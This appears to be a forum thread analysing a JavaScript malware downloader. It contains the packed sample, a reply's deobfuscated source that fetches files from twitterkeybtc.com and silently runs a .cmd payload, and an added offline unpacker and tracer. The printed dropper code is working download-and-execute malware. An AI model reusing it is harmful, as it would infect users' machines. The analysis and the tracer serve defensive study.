Malware
DimiDr0lik, 2014-10-10 10:14:06

Trojan-Downloader.JS.Cryptoload.a virus, decryption help?

Hello comrades.
At work a colleague caught a Trojan-Downloader.JS.Cryptoload.a virus; it arrives as a JS loader.
Help me decipher it.

// Sample as posted. It is the output of the Dean Edwards "p,a,c,k,e,r" JavaScript packer wrapped in eval();
// the "///// FROM THE ..." lines between the statements are junk comments that are part of the sample and do nothing.
///// FROM T/UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn
eval(function(f,j,g,b,i,h)

///////khdjahdjkHJKASdn
///// FROM THE UIAHDASJD

{i=function(a)
/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I 
////RU/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKAC///// FROM THE RU//// I WASAjkhdjahdjkHJKASdnSIAN CROWD
///// FROM THE RU

{return(a<j?"":i(parseInt(a/j)))+((a=a%j)>35?String.fromCharCode(a+29):a.toString(36));};

//// I WANT//// I WASAjkhdjahdjkHJKASdn
///// FROM THE RU/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM THE RU//// I WASAjkhdjahdjkHJKASdnSIAN CROWD

if(!"".replace(/^/,String)){while(g--){h[i(g)]=b[g]||i(g);}b=[function(a){return h[a];}];i=function(){

///// FROM THE RU//// I WASAjkhdjahdjkHJKASdnSIAN CROWD
///// FROM THE 
return"\\w+";};g=1;}while(g--){if(b[g]){f=f.replace(new RegExp("\\b"+i(g)+"\\b","g"),b[g]);}}
/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T////  PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdnROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn

return f;}("3 5=\"%h%\\\\\";3 q=\"%h%\\\\l.o\";3 8=\"H-G.I\";3 9=\"J\";3 c=f.e(\"f.y\");3 x=\"%h%\\\\v.j\";i b(p,r){3 a=k g(\"L.F\");a.M=i(){C(a.A===4){3 7=k g(\"z.B\");7.u();7.D=1;7.E(a.K);7.T=0;7.N(r,2);7.Y()}};a.u(\"V\",p,P);a.O()}i e(m){R k g(m)}3 c=e(\"f.y\");5=c.Q(5);b('d://'+8+'/'+9+'/j.6',''+5+'v.j');W{c.s(''+x+'',1,0)}X(U){};b('d://'+8+'/'+9+'/w.6',''+5+'w.6');b('d://'+8+'/'+9+'/t.6',''+5+'t.6');b('d://'+8+'/'+9+'/n.6',''+5+'n.6');b('d://'+8+'/'+9+'/l.S',''+5+'l.o');c.s(''+q+'',0,0);",61,61,"|||var||hayat|keybtc|objADOStream|rover|sunrise|objXMLHTTP|walkfree|WshShell|http|CreateObject|WScript|ActiveXObject|TEMP|function|doc|new|key|ProgId|trash|cmd|warning|rangerover|warming|Run|fake|open|word|night|crowd|Shell|ADODB|readyState|Stream|if|type|write|XMLHTTP|attachment|mail|com|attach|ResponseBody|MSXML2|onreadystatechange|saveToFile|send|false|ExpandEnvironmentStrings|return|block|position|dcc|GET|try|catch|close".split("|"),0,{}


/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THEKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn
)

/////SSSSII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdnROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdn
);
///////SII I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE UIAHDASJDHKACROWDAN CROWD PROUD
//// I WANT//// I WASAjkhdjahdjkHJKASdnROWDH//// I WASAjkhdjahdjkHJKASdn
///// FROM T//// I WASAjkhdjahdjkHJKASdn
///// FROM THE U


1 answer(s)
sumatorhak (@sumatorhak), 2014-10-14

Hi! I also got something like that at work. I decoded the obfuscated JS, and as a result it is clear where everything was downloaded from and what was launched next. Here is the real JS code:

// Download t to path e: synchronous GET via MSXML2.XMLHTTP, body written to disk with ADODB.Stream
function walkman(t, e){
  var c = new ActiveXObject("MSXML2.XMLHTTP");
  c.onreadystatechange = function(){
    if (4 === c.readyState) {
      var s = new ActiveXObject("ADODB.Stream");
      s.open();
      s.type = 1;                 // adTypeBinary
      s.write(c.ResponseBody);
      s.position = 0;
      s.saveToFile(e, 2);         // adSaveCreateOverWrite
      s.close();
    }
  };
  c.open("GET", t, 0);            // third argument 0: synchronous request
  c.send();
}

function CreateObject(t){
  return new ActiveXObject(t);
}

var sunshine = "attach",                            // never used; the path is hard-coded below
    costarica = "%TEMP%\\",
    gti = "twitterkeybtc.com",
    mercedes = "%TEMP%\\syntax.cmd",
    WshShell = WScript.CreateObject("WScript.Shell"),
    proud = "%TEMP%\\document.doc",
    WshShell = CreateObject("WScript.Shell");       // created a second time

costarica = WshShell.ExpandEnvironmentStrings(costarica);
walkman("http://" + gti + "/attach/doc.keybtc", costarica + "document.doc");

try {
  WshShell.Run(proud, 1, 0);      // window style 1 (visible), do not wait for exit
} catch (cont) {}

walkman("http://" + gti + "/attach/night.keybtc", costarica + "night.keybtc");
walkman("http://" + gti + "/attach/fake.keybtc",  costarica + "fake.keybtc");
walkman("http://" + gti + "/attach/trash.keybtc", costarica + "trash.keybtc");
walkman("http://" + gti + "/attach/key.block",    costarica + "syntax.cmd");   // saved under a new name
WshShell.Run(mercedes, 0, 0);     // window style 0 (hidden), do not wait for exit

As a result, the script is executed only if the WScript object is available, and it downloads several files:
1. twitterkeybtc.com/attach/doc.keybtc (contains some garbage characters, no macros found)
2. twitterkeybtc.com/attach/night.keybtc (NIGHT ;) )
3. twitterkeybtc.com/attach/fake.keybtc (looks a lot like a utility for RSA-1024 encryption; it failed to run because iconv.dll (used for character-encoding conversion) was missing, and after that the desire to run it disappeared =))
4. twitterkeybtc.com/attach/trash.keybtc (trash)
5. twitterkeybtc.com/attach/key.block (this is what gets renamed to syntax.cmd and launched. Most likely obfuscated again, because it contains garbage characters, although it's strange: translating them in Google sometimes even makes sense (I'm probably overworked =) ) )
That's all for now; these are only preliminary results of the analysis of the virus, and it will hardly be possible to decipher it ...
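The following is an added example, not code from either post above. It shows how the sample in the question can be read without handing it to eval(), and how the download-and-run chain the answer describes can be confirmed offline for any variant. The packed string, the radix, the word count and the word list are copied verbatim from the eval(...) call in the question; the unpacker reimplements the decode step of the Dean Edwards p,a,c,k,e,r wrapper that call uses. The WSH stubs, the recorded event format and the fake %TEMP% path are assumptions of the example, and the "response body" is a constructed placeholder. For the answerer's variant, paste that sample's own packed arguments in place of the four constants.

```javascript
// Added example, not code from either post: static unpacker for the Dean Edwards
// "p,a,c,k,e,r" wrapper plus a stubbed WSH environment that records what the
// unpacked script would download, write and run. PACKED, RADIX, COUNT and WORDS are
// copied from the eval(...) call in the question; everything else is an assumption.
const PACKED = "3 5=\"%h%\\\\\";3 q=\"%h%\\\\l.o\";3 8=\"H-G.I\";3 9=\"J\";3 c=f.e(\"f.y\");3 x=\"%h%\\\\v.j\";i b(p,r){3 a=k g(\"L.F\");a.M=i(){C(a.A===4){3 7=k g(\"z.B\");7.u();7.D=1;7.E(a.K);7.T=0;7.N(r,2);7.Y()}};a.u(\"V\",p,P);a.O()}i e(m){R k g(m)}3 c=e(\"f.y\");5=c.Q(5);b('d://'+8+'/'+9+'/j.6',''+5+'v.j');W{c.s(''+x+'',1,0)}X(U){};b('d://'+8+'/'+9+'/w.6',''+5+'w.6');b('d://'+8+'/'+9+'/t.6',''+5+'t.6');b('d://'+8+'/'+9+'/n.6',''+5+'n.6');b('d://'+8+'/'+9+'/l.S',''+5+'l.o');c.s(''+q+'',0,0);";
const RADIX = 61;
const COUNT = 61;
const WORDS = "|||var||hayat|keybtc|objADOStream|rover|sunrise|objXMLHTTP|walkfree|WshShell|http|CreateObject|WScript|ActiveXObject|TEMP|function|doc|new|key|ProgId|trash|cmd|warning|rangerover|warming|Run|fake|open|word|night|crowd|Shell|ADODB|readyState|Stream|if|type|write|XMLHTTP|attachment|mail|com|attach|ResponseBody|MSXML2|onreadystatechange|saveToFile|send|false|ExpandEnvironmentStrings|return|block|position|dcc|GET|try|catch|close".split("|");

// The packer's own index-to-token encoder: 0-9, a-z, then A-Z via charCode + 29.
function encodeToken(n, radix) {
  const head = n < radix ? "" : encodeToken(Math.floor(n / radix), radix);
  const r = n % radix;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Rebuild the dictionary the way the packer does (h[i(g)] = b[g] || i(g)) and
// substitute every \b\w+\b token. The payload is only ever a string here; no eval.
// Tokens outside the dictionary are kept (the packer would have written "undefined").
function unpack(packed, radix, count, words) {
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const tok = encodeToken(i, radix);
    dict.set(tok, words[i] || tok);
  }
  return packed.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Stand-ins for the COM objects the dropper uses. They log calls instead of acting:
// no network, no files, no process launch. FAKE_TEMP is an assumed expansion of %TEMP%.
function makeRecorder() {
  const events = [];
  const FAKE_TEMP = "C:\\Users\\victim\\AppData\\Local\\Temp";
  const shell = {
    ExpandEnvironmentStrings: (s) => s.replace(/%TEMP%/g, FAKE_TEMP),
    Run: (cmd, style, wait) => { events.push({ op: "Run", cmd, style, wait }); return 0; },
  };
  function ActiveXObject(progId) {
    if (progId === "MSXML2.XMLHTTP") {
      return {
        readyState: 0,
        ResponseBody: "<constructed placeholder, no real download>",
        onreadystatechange: null,
        open(method, url) { events.push({ op: method, url }); },
        // send() flips readyState to 4 and fires the handler, as the real object would
        send() { this.readyState = 4; if (this.onreadystatechange) this.onreadystatechange(); },
      };
    }
    if (progId === "ADODB.Stream") {
      return {
        open() {}, write() {}, close() {},
        saveToFile(path, mode) { events.push({ op: "saveToFile", path, mode }); },
      };
    }
    if (progId === "WScript.Shell") return shell;
    throw new Error("unexpected ProgID: " + progId);
  }
  return { events, ActiveXObject, WScript: { CreateObject: ActiveXObject } };
}

// Run the unpacked script with the stubs as its only globals and return the ordered
// list of GET / saveToFile / Run events it produced.
function traceBehaviour(code) {
  const rec = makeRecorder();
  new Function("WScript", "ActiveXObject", code)(rec.WScript, rec.ActiveXObject);
  return rec.events;
}

const unpacked = unpack(PACKED, RADIX, COUNT, WORDS);
console.log(unpacked);
for (const e of traceBehaviour(unpacked)) console.log(JSON.stringify(e));
```

Run it with node: it prints the unpacked source and then one line per recorded event, in order. For the question's sample the trace shows five GETs from http://mail-attachment.com/attach/ (doc.keybtc, night.keybtc, fake.keybtc, trash.keybtc, key.block), each saved into %TEMP%, a visible launch (window style 1) of %TEMP%\word.doc right after the first download, and a hidden launch (window style 0) of %TEMP%\key.cmd at the end, which is key.block saved under a new name. The stubs only answer the ProgIDs this sample asks for and throw on anything else, so a variant that touches another COM object fails loudly instead of silently doing nothing.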
